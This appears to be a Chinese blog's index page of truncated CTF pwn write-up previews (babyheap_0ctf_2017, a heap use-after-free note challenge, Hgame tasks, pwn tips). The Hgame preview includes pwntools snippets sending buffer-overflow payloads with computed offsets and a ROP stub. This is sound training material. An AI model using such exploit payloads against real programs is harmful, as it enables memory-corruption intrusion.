Mr.Be1ieVe's Treasure

路虽远行则将至,事虽难做则必成

babyheap_0ctf_2017

参考wp:https://blog.csdn.net/weixin_42151611/article/details/98119213?fp

堆之UAF(Use_after_free)及调试-hitcontraining_uaf

https://wiki.x10sec.org/pwn/heap/use_after_free/ 一个很直接的想法是修改note的put字段为magic函数的地址,从而实现在执行print note 的时候执行magic函数。 那么该怎么执行呢? 我

BrainOverFlow_Vol.1_BUU特供

很有意思(好玩)的游戏,感谢札哥的题 btw,我也没想到我会是第六个解出来的hhhhh,我可以吹一个月(笑 剧情我就不说了,反正很有意思的 具体东

Hgame

Hard_AAAAA V5在-0x31,s在-0xAC sh.recvuntil("Let's 0O0o\\0O0!") payload="a"*(0xAC - 0x31) payload += '0O0o\x00O0' sh.send(payload) sh.interactive() One_Shot 0xE0 - 0xC0之后刚好是32位,这样第 payload = cyclic(0xE0 - 0xC0) sh.send(payload) sh.recvuntil("shot!\n") payload = str(6295776) sh.send(payload) ROP_LEVEL0 open_read_puts from pwn import * context.log_level = 'debug' context.arch = 'amd64' elf

pwn_by_examples

x64参数按在rdi,rsi,rdx,rcs,r8,r9依次储存 IDA部分 shift f12 字符串 n 重命名 x 查看引用 bash部分 cyclic 200 #生成循环 200个 cyclic -l